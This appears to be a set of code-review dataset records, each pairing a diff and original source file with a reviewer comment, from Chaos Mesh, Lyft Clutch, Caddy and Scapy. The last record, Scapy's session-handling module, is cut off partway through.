@@ -26,7 +26,6 @@ import ( "sigs.k8s.io/controller-runtime/pkg/client" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" - cm "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/iochaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/networkchaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/stresschaos"
1
// Copyright 2020 Chaos Mesh Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // See the License for the specific language governing permissions and // limitations under the License. package cmd import ( "context" "fmt" "strings" "github.com/go-logr/logr" "github.com/spf13/cobra" v1 "k8s.io/apimachinery/pkg/apis/meta/v1" "k8s.io/client-go/kubernetes" "sigs.k8s.io/controller-runtime/pkg/client" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" cm "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/common" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/iochaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/networkchaos" "github.com/chaos-mesh/chaos-mesh/pkg/chaosctl/debug/stresschaos" ) type DebugOptions struct { logger logr.Logger namespace string CaCertFile string CertFile string KeyFile string Insecure bool } const ( networkChaos = "networkchaos" stressChaos = "stresschaos" ioChaos = "iochaos" ) func NewDebugCommand(logger logr.Logger) (*cobra.Command, error) { o := &DebugOptions{ logger: logger, } debugCmd := &cobra.Command{ Use: `debug (CHAOSTYPE) [-c CHAOSNAME] [-n NAMESPACE]`, Short: `Print the debug information for certain chaos`, Long: `Print the debug information for certain chaos. Currently support networkchaos, stresschaos and iochaos. 
Examples: # Return debug information from all networkchaos in default namespace chaosctl debug networkchaos # Return debug information from certain networkchaos chaosctl debug networkchaos CHAOSNAME -n NAMESPACE`, ValidArgsFunction: noCompletions, } // Need to separately support chaos-level completion, so split each chaos apart networkCmd := &cobra.Command{ Use: `networkchaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain network chaos`, Long: `Print the debug information for certain network chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(networkChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(networkChaos, o.namespace, toComplete, clientset.CtrlCli) }, } stressCmd := &cobra.Command{ Use: `stresschaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain stress chaos`, Long: `Print the debug information for certain stress chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(stressChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(stressChaos, o.namespace, toComplete, clientset.CtrlCli) }, } ioCmd := &cobra.Command{ Use: `iochaos (CHAOSNAME) [-n NAMESPACE]`, Short: `Print the debug information for certain io 
chaos`, Long: `Print the debug information for certain io chaos`, RunE: func(cmd *cobra.Command, args []string) error { clientset, err := cm.InitClientSet() if err != nil { return err } return o.Run(ioChaos, args, clientset) }, SilenceErrors: true, SilenceUsage: true, ValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } if len(args) != 0 { return nil, cobra.ShellCompDirectiveNoFileComp } return listChaos(ioChaos, o.namespace, toComplete, clientset.CtrlCli) }, } debugCmd.AddCommand(networkCmd) debugCmd.AddCommand(stressCmd) debugCmd.AddCommand(ioCmd) debugCmd.PersistentFlags().StringVarP(&o.namespace, "namespace", "n", "default", "namespace to find chaos") debugCmd.PersistentFlags().StringVar(&o.CaCertFile, "cacert", "", "file path to cacert file") debugCmd.PersistentFlags().StringVar(&o.CertFile, "cert", "", "file path to cert file") debugCmd.PersistentFlags().StringVar(&o.KeyFile, "key", "", "file path to key file") debugCmd.PersistentFlags().BoolVarP(&o.Insecure, "insecure", "i", false, "Insecure mode will use unauthorized grpc") err := debugCmd.RegisterFlagCompletionFunc("namespace", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) { clientset, err := cm.InitClientSet() if err != nil { return nil, cobra.ShellCompDirectiveDefault } return listNamespace(toComplete, clientset.KubeCli) }) return debugCmd, err } // Run debug func (o *DebugOptions) Run(chaosType string, args []string, c *cm.ClientSet) error { if len(args) > 1 { return fmt.Errorf("only one chaos could be specified") } ctx, cancel := context.WithCancel(context.Background()) defer cancel() chaosName := "" if len(args) == 1 { chaosName = args[0] } chaosList, chaosNameList, err := cm.GetChaosList(ctx, chaosType, chaosName, o.namespace, c.CtrlCli) if err != nil { return err } var result 
[]cm.ChaosResult common.TLSFiles = common.TLSFileConfig{CaCert: o.CaCertFile, Cert: o.CertFile, Key: o.KeyFile} common.Insecure = o.Insecure for i, chaos := range chaosList { var chaosResult cm.ChaosResult chaosResult.Name = chaosNameList[i] var err error switch chaosType { case networkChaos: err = networkchaos.Debug(ctx, chaos, c, &chaosResult) case stressChaos: err = stresschaos.Debug(ctx, chaos, c, &chaosResult) case ioChaos: err = iochaos.Debug(ctx, chaos, c, &chaosResult) default: return fmt.Errorf("chaos type not supported") } result = append(result, chaosResult) if err != nil { cm.PrintResult(result) return err } } cm.PrintResult(result) return nil } func listNamespace(toComplete string, c *kubernetes.Clientset) ([]string, cobra.ShellCompDirective) { namespaces, err := c.CoreV1().Namespaces().List(v1.ListOptions{}) if err != nil { return nil, cobra.ShellCompDirectiveDefault } var ret []string for _, ns := range namespaces.Items { if strings.HasPrefix(ns.Name, toComplete) { ret = append(ret, ns.Name) } } return ret, cobra.ShellCompDirectiveNoFileComp } func listChaos(chaosType string, namespace string, toComplete string, c client.Client) ([]string, cobra.ShellCompDirective) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() _, chaosList, err := cm.GetChaosList(ctx, chaosType, "", namespace, c) if err != nil { return nil, cobra.ShellCompDirectiveDefault } var ret []string for _, chaos := range chaosList { if strings.HasPrefix(chaos, toComplete) { ret = append(ret, chaos) } } return ret, cobra.ShellCompDirectiveNoFileComp }
1
21,458
In line 28, it has been declared twice, so removing `cm` should not impact, can you explain me little bit? :)
chaos-mesh-chaos-mesh
go
@@ -16,7 +16,10 @@ import ( const Name = "clutch.service.topology" -type Service interface{} +type Service interface { + acquireTopologyCacheLock() + startTopologyCache() +} type client struct { config *topologyv1.Config
1
package topology import ( "database/sql" "errors" "github.com/golang/protobuf/ptypes" "github.com/golang/protobuf/ptypes/any" "github.com/uber-go/tally" "go.uber.org/zap" topologyv1 "github.com/lyft/clutch/backend/api/config/service/topology/v1" "github.com/lyft/clutch/backend/service" pgservice "github.com/lyft/clutch/backend/service/db/postgres" ) const Name = "clutch.service.topology" type Service interface{} type client struct { config *topologyv1.Config db *sql.DB log *zap.Logger scope tally.Scope } func New(cfg *any.Any, logger *zap.Logger, scope tally.Scope) (service.Service, error) { topologyConfig := &topologyv1.Config{} err := ptypes.UnmarshalAny(cfg, topologyConfig) if err != nil { return nil, err } p, ok := service.Registry[pgservice.Name] if !ok { return nil, errors.New("Please config the datastore [clutch.service.db.postgres] to use the topology service") } dbClient, ok := p.(pgservice.Client) if !ok { return nil, errors.New("Unable to get the datastore client") } return &client{ config: topologyConfig, db: dbClient.DB(), log: logger, scope: scope, }, nil }
1
8,773
i don't think these unexported functions belong on the public interface, they can exist solely on the struct.
lyft-clutch
go
@@ -263,6 +263,13 @@ func (h Helper) NewBindAddresses(addrs []string) []ConfigValue { return []ConfigValue{{Class: "bind", Value: addrs}} } +// WithDispenser returns a new instance based on d. All others Helper +// fields are copied, so typically maps are shared with this new instance. +func (h Helper) WithDispenser(d *caddyfile.Dispenser) Helper { + h.Dispenser = d + return h +} + // ParseSegmentAsSubroute parses the segment such that its subdirectives // are themselves treated as directives, from which a subroute is built // and returned.
1
// Copyright 2015 Matthew Holt and The Caddy Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package httpcaddyfile import ( "encoding/json" "net" "sort" "strconv" "strings" "github.com/caddyserver/caddy/v2" "github.com/caddyserver/caddy/v2/caddyconfig" "github.com/caddyserver/caddy/v2/caddyconfig/caddyfile" "github.com/caddyserver/caddy/v2/modules/caddyhttp" ) // directiveOrder specifies the order // to apply directives in HTTP routes. // // The root directive goes first in case rewrites or // redirects depend on existence of files, i.e. the // file matcher, which must know the root first. // // The header directive goes second so that headers // can be manipulated before doing redirects. var directiveOrder = []string{ "map", "root", "header", "request_body", "redir", "rewrite", // URI manipulation "uri", "try_files", // middleware handlers; some wrap responses "basicauth", "request_header", "encode", "templates", // special routing & dispatching directives "handle", "handle_path", "route", "push", // handlers that typically respond to requests "respond", "metrics", "reverse_proxy", "php_fastcgi", "file_server", "acme_server", } // directiveIsOrdered returns true if dir is // a known, ordered (sorted) directive. func directiveIsOrdered(dir string) bool { for _, d := range directiveOrder { if d == dir { return true } } return false } // RegisterDirective registers a unique directive dir with an // associated unmarshaling (setup) function. 
When directive dir // is encountered in a Caddyfile, setupFunc will be called to // unmarshal its tokens. func RegisterDirective(dir string, setupFunc UnmarshalFunc) { if _, ok := registeredDirectives[dir]; ok { panic("directive " + dir + " already registered") } registeredDirectives[dir] = setupFunc } // RegisterHandlerDirective is like RegisterDirective, but for // directives which specifically output only an HTTP handler. // Directives registered with this function will always have // an optional matcher token as the first argument. func RegisterHandlerDirective(dir string, setupFunc UnmarshalHandlerFunc) { RegisterDirective(dir, func(h Helper) ([]ConfigValue, error) { if !h.Next() { return nil, h.ArgErr() } matcherSet, err := h.ExtractMatcherSet() if err != nil { return nil, err } val, err := setupFunc(h) if err != nil { return nil, err } return h.NewRoute(matcherSet, val), nil }) } // RegisterGlobalOption registers a unique global option opt with // an associated unmarshaling (setup) function. When the global // option opt is encountered in a Caddyfile, setupFunc will be // called to unmarshal its tokens. func RegisterGlobalOption(opt string, setupFunc UnmarshalGlobalFunc) { if _, ok := registeredGlobalOptions[opt]; ok { panic("global option " + opt + " already registered") } registeredGlobalOptions[opt] = setupFunc } // Helper is a type which helps setup a value from // Caddyfile tokens. type Helper struct { *caddyfile.Dispenser // State stores intermediate variables during caddyfile adaptation. State map[string]interface{} options map[string]interface{} warnings *[]caddyconfig.Warning matcherDefs map[string]caddy.ModuleMap parentBlock caddyfile.ServerBlock groupCounter counter } // Option gets the option keyed by name. func (h Helper) Option(name string) interface{} { return h.options[name] } // Caddyfiles returns the list of config files from // which tokens in the current server block were loaded. 
func (h Helper) Caddyfiles() []string { // first obtain set of names of files involved // in this server block, without duplicates files := make(map[string]struct{}) for _, segment := range h.parentBlock.Segments { for _, token := range segment { files[token.File] = struct{}{} } } // then convert the set into a slice filesSlice := make([]string, 0, len(files)) for file := range files { filesSlice = append(filesSlice, file) } return filesSlice } // JSON converts val into JSON. Any errors are added to warnings. func (h Helper) JSON(val interface{}) json.RawMessage { return caddyconfig.JSON(val, h.warnings) } // MatcherToken assumes the next argument token is (possibly) a matcher, // and if so, returns the matcher set along with a true value. If the next // token is not a matcher, nil and false is returned. Note that a true // value may be returned with a nil matcher set if it is a catch-all. func (h Helper) MatcherToken() (caddy.ModuleMap, bool, error) { if !h.NextArg() { return nil, false, nil } return matcherSetFromMatcherToken(h.Dispenser.Token(), h.matcherDefs, h.warnings) } // ExtractMatcherSet is like MatcherToken, except this is a higher-level // method that returns the matcher set described by the matcher token, // or nil if there is none, and deletes the matcher token from the // dispenser and resets it as if this look-ahead never happened. Useful // when wrapping a route (one or more handlers) in a user-defined matcher. func (h Helper) ExtractMatcherSet() (caddy.ModuleMap, error) { matcherSet, hasMatcher, err := h.MatcherToken() if err != nil { return nil, err } if hasMatcher { // strip matcher token; we don't need to // use the return value here because a // new dispenser should have been made // solely for this directive's tokens, // with no other uses of same slice h.Dispenser.Delete() } h.Dispenser.Reset() // pretend this lookahead never happened return matcherSet, nil } // NewRoute returns config values relevant to creating a new HTTP route. 
func (h Helper) NewRoute(matcherSet caddy.ModuleMap, handler caddyhttp.MiddlewareHandler) []ConfigValue { mod, err := caddy.GetModule(caddy.GetModuleID(handler)) if err != nil { *h.warnings = append(*h.warnings, caddyconfig.Warning{ File: h.File(), Line: h.Line(), Message: err.Error(), }) return nil } var matcherSetsRaw []caddy.ModuleMap if matcherSet != nil { matcherSetsRaw = append(matcherSetsRaw, matcherSet) } return []ConfigValue{ { Class: "route", Value: caddyhttp.Route{ MatcherSetsRaw: matcherSetsRaw, HandlersRaw: []json.RawMessage{caddyconfig.JSONModuleObject(handler, "handler", mod.ID.Name(), h.warnings)}, }, }, } } // GroupRoutes adds the routes (caddyhttp.Route type) in vals to the // same group, if there is more than one route in vals. func (h Helper) GroupRoutes(vals []ConfigValue) { // ensure there's at least two routes; group of one is pointless var count int for _, v := range vals { if _, ok := v.Value.(caddyhttp.Route); ok { count++ if count > 1 { break } } } if count < 2 { return } // now that we know the group will have some effect, do it groupName := h.groupCounter.nextGroup() for i := range vals { if route, ok := vals[i].Value.(caddyhttp.Route); ok { route.Group = groupName vals[i].Value = route } } } // NewBindAddresses returns config values relevant to adding // listener bind addresses to the config. func (h Helper) NewBindAddresses(addrs []string) []ConfigValue { return []ConfigValue{{Class: "bind", Value: addrs}} } // ParseSegmentAsSubroute parses the segment such that its subdirectives // are themselves treated as directives, from which a subroute is built // and returned. 
func ParseSegmentAsSubroute(h Helper) (caddyhttp.MiddlewareHandler, error) { allResults, err := parseSegmentAsConfig(h) if err != nil { return nil, err } return buildSubroute(allResults, h.groupCounter) } // parseSegmentAsConfig parses the segment such that its subdirectives // are themselves treated as directives, including named matcher definitions, // and the raw Config structs are returned. func parseSegmentAsConfig(h Helper) ([]ConfigValue, error) { var allResults []ConfigValue for h.Next() { // don't allow non-matcher args on the first line if h.NextArg() { return nil, h.ArgErr() } // slice the linear list of tokens into top-level segments var segments []caddyfile.Segment for nesting := h.Nesting(); h.NextBlock(nesting); { segments = append(segments, h.NextSegment()) } // copy existing matcher definitions so we can augment // new ones that are defined only in this scope matcherDefs := make(map[string]caddy.ModuleMap, len(h.matcherDefs)) for key, val := range h.matcherDefs { matcherDefs[key] = val } // find and extract any embedded matcher definitions in this scope for i := 0; i < len(segments); i++ { seg := segments[i] if strings.HasPrefix(seg.Directive(), matcherPrefix) { // parse, then add the matcher to matcherDefs err := parseMatcherDefinitions(caddyfile.NewDispenser(seg), matcherDefs) if err != nil { return nil, err } // remove the matcher segment (consumed), then step back the loop segments = append(segments[:i], segments[i+1:]...) 
i-- } } // with matchers ready to go, evaluate each directive's segment for _, seg := range segments { dir := seg.Directive() dirFunc, ok := registeredDirectives[dir] if !ok { return nil, h.Errf("unrecognized directive: %s", dir) } subHelper := h subHelper.Dispenser = caddyfile.NewDispenser(seg) subHelper.matcherDefs = matcherDefs results, err := dirFunc(subHelper) if err != nil { return nil, h.Errf("parsing caddyfile tokens for '%s': %v", dir, err) } for _, result := range results { result.directive = dir allResults = append(allResults, result) } } } return allResults, nil } // ConfigValue represents a value to be added to the final // configuration, or a value to be consulted when building // the final configuration. type ConfigValue struct { // The kind of value this is. As the config is // being built, the adapter will look in the // "pile" for values belonging to a certain // class when it is setting up a certain part // of the config. The associated value will be // type-asserted and placed accordingly. Class string // The value to be used when building the config. // Generally its type is associated with the // name of the Class. 
Value interface{} directive string } func sortRoutes(routes []ConfigValue) { dirPositions := make(map[string]int) for i, dir := range directiveOrder { dirPositions[dir] = i } sort.SliceStable(routes, func(i, j int) bool { // if the directives are different, just use the established directive order iDir, jDir := routes[i].directive, routes[j].directive if iDir != jDir { return dirPositions[iDir] < dirPositions[jDir] } // directives are the same; sub-sort by path matcher length if there's // only one matcher set and one path (this is a very common case and // usually -- but not always -- helpful/expected, oh well; user can // always take manual control of order using handler or route blocks) iRoute, ok := routes[i].Value.(caddyhttp.Route) if !ok { return false } jRoute, ok := routes[j].Value.(caddyhttp.Route) if !ok { return false } // decode the path matchers, if there is just one of them var iPM, jPM caddyhttp.MatchPath if len(iRoute.MatcherSetsRaw) == 1 { _ = json.Unmarshal(iRoute.MatcherSetsRaw[0]["path"], &iPM) } if len(jRoute.MatcherSetsRaw) == 1 { _ = json.Unmarshal(jRoute.MatcherSetsRaw[0]["path"], &jPM) } // sort by longer path (more specific) first; missing path // matchers or multi-matchers are treated as zero-length paths var iPathLen, jPathLen int if len(iPM) > 0 { iPathLen = len(iPM[0]) } if len(jPM) > 0 { jPathLen = len(jPM[0]) } // if both directives have no path matcher, use whichever one // has any kind of matcher defined first. if iPathLen == 0 && jPathLen == 0 { return len(iRoute.MatcherSetsRaw) > 0 && len(jRoute.MatcherSetsRaw) == 0 } // sort with the most-specific (longest) path first return iPathLen > jPathLen }) } // serverBlock pairs a Caddyfile server block with // a "pile" of config values, keyed by class name, // as well as its parsed keys for convenience. 
type serverBlock struct { block caddyfile.ServerBlock pile map[string][]ConfigValue // config values obtained from directives keys []Address } // hostsFromKeys returns a list of all the non-empty hostnames found in // the keys of the server block sb. If logger mode is false, a key with // an empty hostname portion will return an empty slice, since that // server block is interpreted to effectively match all hosts. An empty // string is never added to the slice. // // If loggerMode is true, then the non-standard ports of keys will be // joined to the hostnames. This is to effectively match the Host // header of requests that come in for that key. // // The resulting slice is not sorted but will never have duplicates. func (sb serverBlock) hostsFromKeys(loggerMode bool) []string { // ensure each entry in our list is unique hostMap := make(map[string]struct{}) for _, addr := range sb.keys { if addr.Host == "" { if !loggerMode { // server block contains a key like ":443", i.e. the host portion // is empty / catch-all, which means to match all hosts return []string{} } // never append an empty string continue } if loggerMode && addr.Port != "" && addr.Port != strconv.Itoa(caddyhttp.DefaultHTTPPort) && addr.Port != strconv.Itoa(caddyhttp.DefaultHTTPSPort) { hostMap[net.JoinHostPort(addr.Host, addr.Port)] = struct{}{} } else { hostMap[addr.Host] = struct{}{} } } // convert map to slice sblockHosts := make([]string, 0, len(hostMap)) for host := range hostMap { sblockHosts = append(sblockHosts, host) } return sblockHosts } // hasHostCatchAllKey returns true if sb has a key that // omits a host portion, i.e. it "catches all" hosts. func (sb serverBlock) hasHostCatchAllKey() bool { for _, addr := range sb.keys { if addr.Host == "" { return true } } return false } type ( // UnmarshalFunc is a function which can unmarshal Caddyfile // tokens into zero or more config values using a Helper type. // These are passed in a call to RegisterDirective. 
UnmarshalFunc func(h Helper) ([]ConfigValue, error) // UnmarshalHandlerFunc is like UnmarshalFunc, except the // output of the unmarshaling is an HTTP handler. This // function does not need to deal with HTTP request matching // which is abstracted away. Since writing HTTP handlers // with Caddyfile support is very common, this is a more // convenient way to add a handler to the chain since a lot // of the details common to HTTP handlers are taken care of // for you. These are passed to a call to // RegisterHandlerDirective. UnmarshalHandlerFunc func(h Helper) (caddyhttp.MiddlewareHandler, error) // UnmarshalGlobalFunc is a function which can unmarshal Caddyfile // tokens into a global option config value using a Helper type. // These are passed in a call to RegisterGlobalOption. UnmarshalGlobalFunc func(d *caddyfile.Dispenser) (interface{}, error) ) var registeredDirectives = make(map[string]UnmarshalFunc) var registeredGlobalOptions = make(map[string]UnmarshalGlobalFunc)
1
15,612
I'm not entirely clear on why this is necessary?
caddyserver-caddy
go
@@ -317,7 +317,7 @@ def save_session(fname="", session=None, pickleProto=-1): if not fname: fname = conf.session if not fname: - conf.session = fname = utils.get_temp_file(keep=True) + conf.session = fname = cast(str, utils.get_temp_file(keep=True)) log_interactive.info("Use [%s] as session file" % fname) if not session:
1
# This file is part of Scapy # See http://www.secdev.org/projects/scapy for more information # Copyright (C) Philippe Biondi <[email protected]> # This program is published under a GPLv2 license """ Main module for interactive startup. """ from __future__ import absolute_import from __future__ import print_function import sys import os import getopt import code import gzip import glob import importlib import io import logging import types import warnings from random import choice # Never add any global import, in main.py, that would trigger a # warning message before the console handlers gets added in interact() from scapy.error import ( log_interactive, log_loading, Scapy_Exception, ) import scapy.modules.six as six from scapy.themes import DefaultTheme, BlackAndWhite, apply_ipython_style from scapy.consts import WINDOWS from scapy.compat import ( cast, Any, Dict, List, Optional, Tuple, Union ) IGNORED = list(six.moves.builtins.__dict__) LAYER_ALIASES = { "tls": "tls.all" } QUOTES = [ ("Craft packets like it is your last day on earth.", "Lao-Tze"), ("Craft packets like I craft my beer.", "Jean De Clerck"), ("Craft packets before they craft you.", "Socrate"), ("Craft me if you can.", "IPv6 layer"), ("To craft a packet, you have to be a packet, and learn how to swim in " "the wires and in the waves.", "Jean-Claude Van Damme"), ("We are in France, we say Skappee. OK? Merci.", "Sebastien Chabal"), ("Wanna support scapy? Rate it on sectools! 
" "http://sectools.org/tool/scapy/", "Satoshi Nakamoto"), ("What is dead may never die!", "Python 2"), ] def _probe_config_file(cf): # type: (str) -> Union[str, None] cf_path = os.path.join(os.path.expanduser("~"), cf) try: os.stat(cf_path) except OSError: return None else: return cf_path def _read_config_file(cf, _globals=globals(), _locals=locals(), interactive=True): # type: (str, Dict[str, Any], Dict[str, Any], bool) -> None """Read a config file: execute a python file while loading scapy, that may contain some pre-configured values. If _globals or _locals are specified, they will be updated with the loaded vars. This allows an external program to use the function. Otherwise, vars are only available from inside the scapy console. params: - _globals: the globals() vars - _locals: the locals() vars - interactive: specified whether or not errors should be printed using the scapy console or raised. ex, content of a config.py file: 'conf.verb = 42\n' Manual loading: >>> _read_config_file("./config.py")) >>> conf.verb 42 """ log_loading.debug("Loading config file [%s]", cf) try: with open(cf) as cfgf: exec( compile(cfgf.read(), cf, 'exec'), _globals, _locals ) except IOError as e: if interactive: raise log_loading.warning("Cannot read config file [%s] [%s]", cf, e) except Exception: if interactive: raise log_loading.exception("Error during evaluation of config file [%s]", cf) def _validate_local(x): # type: (str) -> bool """Returns whether or not a variable should be imported. 
Will return False for any default modules (sys), or if they are detected as private vars (starting with a _)""" global IGNORED return x[0] != "_" and x not in IGNORED DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") DEFAULT_STARTUP_FILE = _probe_config_file(".scapy_startup.py") def _usage(): # type: () -> None print( "Usage: scapy.py [-s sessionfile] [-c new_startup_file] " "[-p new_prestart_file] [-C] [-P] [-H]\n" "Args:\n" "\t-H: header-less start\n" "\t-C: do not read startup file\n" "\t-P: do not read pre-startup file\n" ) sys.exit(0) ###################### # Extension system # ###################### def _load(module, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Python module to make variables, objects and functions available globally. The idea is to load the module using importlib, then copy the symbols to the global symbol table. """ if globals_dict is None: globals_dict = six.moves.builtins.__dict__ try: mod = importlib.import_module(module) if '__all__' in mod.__dict__: # import listed symbols for name in mod.__dict__['__all__']: if symb_list is not None: symb_list.append(name) globals_dict[name] = mod.__dict__[name] else: # only import non-private symbols for name, sym in six.iteritems(mod.__dict__): if _validate_local(name): if symb_list is not None: symb_list.append(name) globals_dict[name] = sym except Exception: log_interactive.error("Loading module %s", module, exc_info=True) def load_module(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy module to make variables, objects and functions available globally. """ _load("scapy.modules." 
+ name, globals_dict=globals_dict, symb_list=symb_list) def load_layer(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy layer module to make variables, objects and functions available globally. """ _load("scapy.layers." + LAYER_ALIASES.get(name, name), globals_dict=globals_dict, symb_list=symb_list) def load_contrib(name, globals_dict=None, symb_list=None): # type: (str, Optional[Dict[str, Any]], Optional[List[str]]) -> None """Loads a Scapy contrib module to make variables, objects and functions available globally. If no contrib module can be found with the given name, try to find a layer module, since a contrib module may become a layer module. """ try: importlib.import_module("scapy.contrib." + name) _load("scapy.contrib." + name, globals_dict=globals_dict, symb_list=symb_list) except ImportError as e: # if layer not found in contrib, try in layers try: load_layer(name, globals_dict=globals_dict, symb_list=symb_list) except ImportError: raise e # Let's raise the original error to avoid confusion def list_contrib(name=None, # type: Optional[str] ret=False, # type: bool _debug=False # type: bool ): # type: (...) -> Optional[List[Dict[str, Union[str, None]]]] """Show the list of all existing contribs. :param name: filter to search the contribs :param ret: whether the function should return a dict instead of printing it :returns: None or a dictionary containing the results if ret=True """ # _debug: checks that all contrib modules have correctly defined: # # scapy.contrib.description = [...] # # scapy.contrib.status = [...] # # scapy.contrib.name = [...] (optional) # or set the flag: # # scapy.contrib.description = skip # to skip the file if name is None: name = "*.py" elif "*" not in name and "?" 
not in name and not name.endswith(".py"): name += ".py" results = [] # type: List[Dict[str, Union[str, None]]] dir_path = os.path.join(os.path.dirname(__file__), "contrib") if sys.version_info >= (3, 5): name = os.path.join(dir_path, "**", name) iterator = glob.iglob(name, recursive=True) else: name = os.path.join(dir_path, name) iterator = glob.iglob(name) for f in iterator: mod = f.replace(os.path.sep, ".").partition("contrib.")[2] if mod.startswith("__"): continue if mod.endswith(".py"): mod = mod[:-3] desc = {"description": None, "status": None, "name": mod} with io.open(f, errors="replace") as fd: for line in fd: if line[0] != "#": continue p = line.find("scapy.contrib.") if p >= 0: p += 14 q = line.find("=", p) key = line[p:q].strip() value = line[q + 1:].strip() desc[key] = value if desc["status"] == "skip": break if desc["description"] and desc["status"]: results.append(desc) break if _debug: if desc["status"] == "skip": pass elif not desc["description"] or not desc["status"]: raise Scapy_Exception("Module %s is missing its " "contrib infos !" % mod) results.sort(key=lambda x: x["name"]) if ret: return results else: for desc in results: print("%(name)-20s: %(description)-40s status=%(status)s" % desc) return None ############################## # Session saving/restoring # ############################## def update_ipython_session(session): # type: (Dict[str, Any]) -> None """Updates IPython session with a custom one""" try: from IPython import get_ipython get_ipython().user_ns.update(session) except Exception: pass def save_session(fname="", session=None, pickleProto=-1): # type: (str, Optional[Dict[str, Any]], int) -> None """Save current Scapy session to the file specified in the fname arg. params: - fname: file to save the scapy session in - session: scapy session to use. 
If None, the console one will be used - pickleProto: pickle proto version (default: -1 = latest)""" from scapy import utils from scapy.config import conf, ConfClass if not fname: fname = conf.session if not fname: conf.session = fname = utils.get_temp_file(keep=True) log_interactive.info("Use [%s] as session file" % fname) if not session: try: from IPython import get_ipython session = get_ipython().user_ns except Exception: session = six.moves.builtins.__dict__["scapy_session"] to_be_saved = cast(Dict[str, Any], session).copy() if "__builtins__" in to_be_saved: del(to_be_saved["__builtins__"]) for k in list(to_be_saved): i = to_be_saved[k] if hasattr(i, "__module__") and (k[0] == "_" or i.__module__.startswith("IPython")): del(to_be_saved[k]) if isinstance(i, ConfClass): del(to_be_saved[k]) elif isinstance(i, (type, type, types.ModuleType)): if k[0] != "_": log_interactive.error("[%s] (%s) can't be saved.", k, type(to_be_saved[k])) del(to_be_saved[k]) try: os.rename(fname, fname + ".bak") except OSError: pass f = gzip.open(fname, "wb") six.moves.cPickle.dump(to_be_saved, f, pickleProto) f.close() def load_session(fname=None): # type: (Optional[Union[str, None]]) -> None """Load current Scapy session from the file specified in the fname arg. This will erase any existing session. params: - fname: file to load the scapy session from""" from scapy.config import conf if fname is None: fname = conf.session try: s = six.moves.cPickle.load(gzip.open(fname, "rb")) except IOError: try: s = six.moves.cPickle.load(open(fname, "rb")) except IOError: # Raise "No such file exception" raise scapy_session = six.moves.builtins.__dict__["scapy_session"] scapy_session.clear() scapy_session.update(s) update_ipython_session(scapy_session) log_loading.info("Loaded session [%s]" % fname) def update_session(fname=None): # type: (Optional[Union[str, None]]) -> None """Update current Scapy session from the file specified in the fname arg. 
params: - fname: file to load the scapy session from""" from scapy.config import conf if fname is None: fname = conf.session try: s = six.moves.cPickle.load(gzip.open(fname, "rb")) except IOError: s = six.moves.cPickle.load(open(fname, "rb")) scapy_session = six.moves.builtins.__dict__["scapy_session"] scapy_session.update(s) update_ipython_session(scapy_session) def init_session(session_name, # type: Optional[Union[str, None]] mydict=None # type: Optional[Union[Dict[str, Any], None]] ): # type: (...) -> Tuple[Dict[str, Any], List[str]] from scapy.config import conf SESSION = {} # type: Dict[str, Any] GLOBKEYS = [] # type: List[str] scapy_builtins = {k: v for k, v in six.iteritems( importlib.import_module(".all", "scapy").__dict__ ) if _validate_local(k)} six.moves.builtins.__dict__.update(scapy_builtins) GLOBKEYS.extend(scapy_builtins) GLOBKEYS.append("scapy_session") if session_name: try: os.stat(session_name) except OSError: log_loading.info("New session [%s]" % session_name) else: try: try: SESSION = six.moves.cPickle.load(gzip.open(session_name, "rb")) except IOError: SESSION = six.moves.cPickle.load(open(session_name, "rb")) log_loading.info("Using session [%s]" % session_name) except ValueError: msg = "Error opening Python3 pickled session on Python2 [%s]" log_loading.error(msg % session_name) except EOFError: log_loading.error("Error opening session [%s]" % session_name) except AttributeError: log_loading.error("Error opening session [%s]. 
